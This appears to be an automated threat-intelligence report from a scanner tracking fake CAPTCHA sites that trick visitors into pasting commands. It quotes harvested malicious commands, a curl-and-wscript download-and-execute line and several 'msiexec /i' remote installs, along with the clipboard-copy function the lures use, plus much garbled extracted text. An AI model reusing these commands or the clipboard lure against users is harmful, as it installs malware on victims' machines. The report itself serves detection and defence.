ClickGrab Threat Analysis Report - 2026-06-01
Generated on 2026-06-01 02:09:20
Executive Summary
- Total sites analyzed: 100
- Sites with malicious content: 18
- Unique domains encountered: 250
- Total URLs extracted: 4,801
- PowerShell download attempts: 2
- Clipboard manipulation instances: 85
Domain Analysis
Most Frequently Encountered Domains
- bharatnamkeens.com: 428 occurrences
- baovechuyennghiep.baovengayvadem.com: 348 occurrences
- www.maheshwaree.com: 316 occurrences
- 98.70.13.131: 303 occurrences
- fudgeshop.com.au: 265 occurrences
- picsera.com: 227 occurrences
- 18.176.47.246: 218 occurrences
- hhpms.com: 214 occurrences
- scillarodriguez.com: 199 occurrences
- www.ccera-icar.org: 178 occurrences
- senevie.com: 174 occurrences
- www.evodigital.com.au: 156 occurrences
- devblog.ezeelogin.com: 126 occurrences
- www.dorper.com.au: 125 occurrences
- akademiawalki.com: 125 occurrences
URL Pattern Analysis
reCAPTCHA imagery
11 occurrences across 8 distinct URLs
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png(2 times)https://www.google.com/recaptcha/api.js(2 times)https://2captcha.com/dist/web/assets/google-privacy-policy-Cb0CGVRT.svg(2 times)https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha(1 times)https://www.google.com/recaptcha/api.js?hl=&render=6Lf7uxYsAAAAANagtTWlY2ET8HF8nbfMf4-ePcWm(1 times)- ...and 3 more distinct URLs
Font resources
86 occurrences across 75 distinct URLs
https://fonts.gstatic.com(6 times)https://fonts.googleapis.com(4 times)https://18.176.47.246/wp-content/plugins/vk-post-author-display/vendor/vektor-inc/font-awesome-versions/src/font-awesome/css/all.min.css?ver=7.1.0(2 times)http://18.176.47.246/wp-content/plugins/vk-post-author-display/vendor/vektor-inc/font-awesome-versions/src/font-awesome/css/all.min.css?ver=7.1.0(2 times)https://use.fontawesome.com/releases/v5.0.0/css/all.css(2 times)- ...and 70 more distinct URLs
CDN hosted scripts
9 occurrences across 9 distinct URLs
https://cdn.jsdelivr.net/npm/three@0.167.0/build/three.module.js(1 times)https://cdn.jsdelivr.net/npm/three@0.167.0/examples/jsm/(1 times)https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.css?ver=6.8.5(1 times)https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.min.js?ver=6.0.8(1 times)https://diffuser-cdn.app-us1.com/diffuser/diffuser.js,(1 times)- ...and 4 more distinct URLs
Google resources
130 occurrences across 76 distinct URLs
https://bharatnamkeens.com/wp-content/plugins/widget-google-reviews/assets/img/guest.png(32 times)https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent(11 times)https://fonts.googleapis.com(4 times)https://www.googletagmanager.com/gtm.js?id=(4 times)https://www.google(3 times)- ...and 71 more distinct URLs
Suspicious Keyword Analysis
Total Keywords Found: 482 (107 unique)
Keyword Categories
Social Engineering
45 unique keywords
VerificationcaptchaSiteKeyTo better prove you are not a robotCaptchaCheckboxcaptcha_wordcommand = "msiexec /i https://shift-art.com/123/cloudflare/verify/humanverfification/cloudflarechallenge/CustomerID37832738/";CaptchaListenersrobotcommand = "msiexec /i https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha";verification-code-bEE4bmZ6Sis0OVNmUDNCTHp3NWF2VmtTOEVZS2tDeThycE1CcFNPZUttcUZVVnBlT01LZlk1UFh1bm1vZDFqUm5ZOU91c3FNMk5rMnh3MWxqNDdNTTh4UUlnRW1RVjJmemdOM1drcEJWWnk2VmdFUWFac05XcWJMOW9BdkFWRFN8NlJHVVdMb21HSEFXRkc0SFErT0N3ODBid0t3MjA3djcwc20yZHhFekdOST0- ...and 35 more
Obfuscation Indicators
11 unique keywords
exec() QApplication::%s: Please instantiate the QApplication object first %L1 WARNING: QApplication was not created in the main() thread. �sgqAppName QCoreApplication: Application event filter cannot be in a different thread. QCoreApplication: Object event filter cannot be in a different thread. QCoreApplication::applicationFilePath: Please instantiate the QApplication object first QCoreApplication::argc: Please instantiate the QApplication object first QCoreApplication::argv: Please instantiate the QApplication object first QCoreApplication::enter_loop: Must be called from the main thread enter_loop loopLevel QCoreApplication::notify: Unexpected null receiver installTranslator QCoreApplication::applicationDirPath: Please instantiate the QApplication object first removeTranslator QCoreApplication::postEvent: Unexpected null receiver QCoreApplication::sendPostedEvents: Cannot send posted events for objects in another thread QCoreApplication::exit_loop: Must be called from the main thread exit_loop <�g��g��g��gP-g�g� g��g��g��g��g��g g� g�� g-testability -graphicssystem -session -style -style= -widgetcount -stylesheet -reverse -qdebug -qdevel QCoreApplication::arguments: Please instantiate the QApplication object first QT_PLUGIN_PATH QCoreApplication::exec: The event loop is already running %s::exec: Must be called from the main thread exec ��g�3g��g�3g �g4gl�g�4g:: const enum class struct char short ulong long uint int unsigned const onst Qt void QMetaMethod::invoke: Dead lock detected in BlockingQueuedConnection: Receiver is %s(%p)eval(this._loadScript(url.url) + "\n//@ sourceURL= " + url.url)eval('var timeOut'+popupItems[i].id)eval(frameContents)eval("clearTimeout(timeIn"+uid+")")eval(script)eval("timeIn"+uid+" = setTimeout(function(){ li.find('> .catalog-section-childs').show(15).css({'top': top + 'px', 'left': left + 'px'}); }, 200);")eval(Command for the linkW! Set the Show Command for the linkW Tell the link to resolve itselfWWW! Get the IconLocation for the linkW! Set the IconLocation for the linkW! Tell the link to save the changesW ISetupStringTable InterfaceWWW Get string from nameWW get_SuiteCallbackW put_SuiteCallbackW get_SuiteExtension put_SuiteExtensionI Command line argument passed to setup.exe when it's launched after rebootW* Set a shortcut property for an opened link7 Retrieve any failures from applying shortcut propertiesWWW0 Set a shortcut property for Run As AdministratorWW3 Retrieve shortcut property for Run As AdministratorWWW. Interface ISetupDynamicLinkedLibraryController InstallShield LogServices ClassWWW ISetupLogService Interface8 Opens the Log Database from the specified Storage objectWW: Creates a new Log Database on the specified Storage object* Opens the Log Database in a read-only mode ISetupLogService2 InterfaceWWW SetupMainWindow ClassW ISetupMainWindow Interface Window caption Window handleW Shows/Hides wait cursorWWW Create windowW Destroy window ISetupWindowText Interface property Color property TextWeval("timeOut"+uid+" = setTimeout(function(){ li.find('> .catalog-section-childs').hide(15); }, 200);")- ...and 1 more
System Commands
28 unique keywords
exec /i http://inkbookwriters.com/verify';exec(source)exec(ua) != null){rv = parseFloat(RegExp.$1);}}else if (n.appName == "Netscape"){rv = 11;re = new RegExp("Trident/.*rv:([0-9]+[\.0-9]*)");if (re.exec(ua) != null){rv = parseFloat(RegExp.$1);}}}return rv;}})(window, document, navigator)exec(url)exec(const command =CMDpowershellcmd /c "curl -s http://178.17.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nul && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';exec(url))- ...and 18 more
Verification Text
3 unique keywords
ray idhiddenHidden
Technical Terms
20 unique keywords
failed_to_retrieveodysseypress EnteriexbypassWebClientieX.batXMLHTTPYou will observe- ...and 10 more
Most Frequent Keywords
- hidden: 43 occurrences
- robot: 37 occurrences
- Robot: 28 occurrences
- failed_to_retrieve: 25 occurrences
- verification: 17 occurrences
- CAPTCHA: 16 occurrences
- Verification: 15 occurrences
- CAPTCHA Verification: 14 occurrences
- I am not a robot: 14 occurrences
- You will observe: 14 occurrences
- verification-id: 14 occurrences
- To better prove you are not a robot: 14 occurrences
- Verification ID: 13 occurrences
- captcha: 13 occurrences
- Ray ID: 12 occurrences
Similar Keyword Patterns
Groups of keywords that appear to be variations of the same theme:
Group 1: cmd /c "curl -s http://178.17.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nul && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';, command = 'cmd /c "curl -s http://178.17.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nul && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';
Group 2: CAPTCHA Verification, CAPTCHA-verificatie-ID, Verification, verification
Group 3: Verification ID, verification-id, verification_data, verification id, Verification Hash, verification_id
Group 4: Ray ID, ray id
Group 5: CAPTCHA, captcha, captcha-badge, captcha-logo, CAPTCHA-logo, captcha-box, captcha_word, captcha_sid, captcha-js, Captcha, captcha_link_, CaptchaError
JavaScript Obfuscation Analysis
Obfuscation Sophistication Score: 0/7
Potential Base64 Encoded Content
These strings may contain encoded malicious payloads:
UnpublishProductAppIdQSocks5SocketEnginePrivatecaRemoveVRoots1ISCHECKFORPRODUCTUPDATESAllUsersApp...emitPendingConnectionNotificationservicesUnpublishing
Clipboard Manipulation Analysis
Detected clipboard manipulation in 85 instances.
Document.Execcommand Copy
Found in 36 snippets (42.4% of clipboard code)
Examples:
document.execCommand('copy')
try { document.execCommand('copy')
document.execCommand("copy")
Textarea Manipulation
Found in 39 snippets (45.9% of clipboard code)
Examples:
ipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"
tListener("click", function () { const textarea = document.createElement('textarea'
ng is the safe placeholder above const textarea = document.createElement('textarea'
Complete Malicious Functions
Function 1:
function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }
Report truncated for storage. Full per-site detail is available in the scan JSON under nightly_reports/.